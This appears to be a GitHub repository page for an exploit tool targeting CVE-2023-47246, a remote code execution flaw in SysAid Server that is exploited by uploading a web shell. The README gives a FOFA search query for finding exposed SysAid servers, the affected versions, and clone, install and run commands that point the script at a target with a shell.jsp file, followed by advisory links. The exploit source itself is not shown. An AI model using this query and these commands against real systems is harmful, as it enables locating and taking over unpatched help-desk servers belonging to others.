Skip to content

exploit for cve-2023-47246 SysAid RCE (shell upload)

Notifications You must be signed in to change notification settings

lolminerxmrig/CVE-2023-47246-EXP

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 
 
 
 
 

Repository files navigation

Vulnerability Details

  1. fofa:

    body="sysaid-logo-dark-green.png" || title="SysAid Help Desk Software" || body="Help Desk software <a href=\"http://www.sysaid.com\">by SysAid</a>"
    
  2. Affected versions: SysAid Server<23.3.36

Vulnerability Recurrence

  1. Execute the script:

    git clone https://github.com/W01fh4cker/CVE-2023-47246-EXP.git
    cd CVE-2023-47246-EXP
    pip install -r requirements.txt
    python CVE-2023-47246-EXP.py -u http://192.168.161.190:8443 -p http://127.0.0.1:8083 -f shell.jsp
  2. result:

Reference

https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2023/CVE-2023-47246.yaml
https://www.huntress.com/blog/critical-vulnerability-sysaid-cve-2023-47246
https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification
https://www.zscaler.com/blogs/security-research/coverage-advisory-cve-2023-47246-sysaid-zero-day-vulnerability

About

exploit for cve-2023-47246 SysAid RCE (shell upload)

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • Python 100.0%